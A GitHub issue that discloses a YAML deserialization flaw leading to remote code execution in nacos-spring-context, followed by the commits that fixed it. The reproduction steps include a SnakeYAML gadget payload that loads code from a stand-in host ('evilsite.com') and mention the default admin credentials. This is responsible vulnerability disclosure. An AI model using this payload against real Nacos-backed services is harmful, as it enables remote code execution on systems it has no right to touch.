Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

YAML deserialization vulnerability leads to RCE #314

Closed
bybit-sec opened this issue May 29, 2023 · 1 comment
Closed

YAML deserialization vulnerability leads to RCE #314

bybit-sec opened this issue May 29, 2023 · 1 comment
Milestone
1.1.2

Comments

@bybit-sec
Copy link

bybit-sec commented May 29, 2023
edited
Loading

Issue Description

The SnakeYaml's Constructor() class is used in the component nacos-spring-context, but it does not restrict types that can be instantiated during deserialization.

Describe what happened (or what feature you want)

Deserializing yaml content provided by an attacker can lead to remote code execution.
So when spring framework project uses nacos-spring-context as a dependency, It will be easily RCE by just adding evil config in nacos server.

Describe what you expected to happen

Unsupported YAML content.

How to reproduce it (as minimally and precisely as possible)

  1. Create a project of empty spring-framework, and add dependency of nacos-spring-context.
  2. Add codes below, as the document says, it setting NacosPropertySource:
+import com.alibaba.nacos.api.config.ConfigType;
+import com.alibaba.nacos.spring.context.annotation.config.NacosPropertySource;

 @SpringBootApplication
+@NacosPropertySource(dataId = "example.yaml", type=ConfigType.YAML, autoRefreshed=true)
 public class Application {

        public static void main(String[] args) {
              ......
  1. Now login to nacos config server(default at http://127.0.0.1:8848 with credential of nacos/nacos), then edit example.yaml, add one line of config below:
test: !!javax.script.ScriptEngineManager  [ !!java.net.URLClassLoader  [[ !!java.net.URL  [ "http://evilsite.com" ]]]]

Tell us your environment

spring-framework 2.7.8
nacos-spring-context 1.1.1

Anything else we need to know?
stone-98 added a commit to stone-98/nacos-spring-project that referenced this issue Nov 16, 2023
@stone-98
[ISSUE nacos-group#314]Fix the RCE caused by the vulnerability in YAM…
a00bdb2 
…L deserialization.
@stone-98 stone-98 mentioned this issue Nov 16, 2023
Merged
5 tasks
stone-98 added a commit to stone-98/nacos-spring-project that referenced this issue Nov 20, 2023
@stone-98
[ISSUE nacos-group#314]Add YAML_ALLOW_OBJECT.
dda1554
stone-98 added a commit to stone-98/nacos-spring-project that referenced this issue Nov 21, 2023
@stone-98
[ISSUE nacos-group#314]Add README.md.
f963833
KomachiSion pushed a commit that referenced this issue Nov 22, 2023
@stone-98
[ISSUE #314]Fix the RCE caused by the vulnerability in YAML deseriali… (
5f0eb0b 
#328)

* [ISSUE #314]Fix the RCE caused by the vulnerability in YAML deserialization.

* [ISSUE #314]Add YAML_ALLOW_OBJECT.

* [ISSUE #314]Add README.md.

* update style.

* Update.

* Update README.md
@stone-98
Copy link
Contributor

@ready to close@

@KomachiSion KomachiSion added this to the 1.1.2 milestone Nov 30, 2023
bulain pushed a commit to bulain/nacos-spring-project that referenced this issue Jan 2, 2024
@stone-98 @hujun-w-2
[ISSUE nacos-group#314]Fix the RCE caused by the vulnerability in YAM…
f7fae96 
…L deseriali… (nacos-group#328)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
1.1.2
Development

No branches or pull requests
3 participants
@stone-98 @KomachiSion @bybit-sec